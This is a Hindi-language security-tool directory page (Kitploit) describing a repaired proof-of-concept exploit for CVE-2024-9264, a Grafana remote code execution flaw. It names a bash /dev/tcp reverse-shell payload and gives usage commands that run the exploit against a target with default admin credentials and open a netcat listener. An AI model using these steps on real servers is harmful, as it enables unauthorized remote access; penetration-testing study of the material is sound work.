Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/exerrdev/cve-2024-9264-fixed
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

CVE-2024-9264 के लिए निश्चित प्रूफ-ऑफ-कॉन्सेप्ट शोषण, DuckDB SQL एक्सप्रेशन के माध्यम से एक महत्वपूर्ण Grafana RCE। सही किए गए shellfs एक्सटेंशन और writefile() फ़ंक्शन का उपयोग करके रिवर्स शेल निष्पादित करता है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛠️ CVE-2024-9264 - फिक्स्ड Grafana RCE एक्सप्लॉइट

यह CVE-2024-9264 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट का फिक्स्ड संस्करण है, जो Grafana में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता है (SQL एक्सप्रेशन और DuckDB के माध्यम से)।

🔗 मूल एडवाइज़री: Grafana Security Release
❌ मूल PoC: सिंटैक्स त्रुटियों और write_file() के गलत उपयोग के कारण टूटा हुआ
✅ यह संस्करण काम करता है, एक असुरक्षित Grafana 11.0.0 इंस्टेंस पर परीक्षण किया गया।


✅ इस संस्करण में सुधार

  • ✅ write_file() के बजाय writefile() (DuckDB फ़ंक्शन) का सही उपयोग करता है
  • ✅ bash -i >& /dev/tcp/... का उपयोग करके सही शेल पेलोड
  • ✅ shellfs एक्सटेंशन के माध्यम से रिवर्स शेल सफलतापूर्वक लिखा और निष्पादित किया गया

📦 आवश्यकताएँ

  • Grafana इंस्टेंस जिसमें:
    • DuckDB बैकएंड
    • install shellfs from community करने की क्षमता
  • आपकी अटैकर मशीन पर एक netcat लिसनर

🚀 उपयोग

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

फिर लिसन करने के लिए:

root@kitploit:~
nc -lvnp 4444

⚠️ कानूनी अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है।
इसे उन लक्ष्यों के विरुद्ध उपयोग न करें जिनका परीक्षण करने की आपके पास अनुमति नहीं है।


✍️ इस सुधार के लेखक

Exerr द्वारा संशोधित और मान्य किया गया — मूल PoC z3k0sec द्वारा।

टूल डाउनलोड करें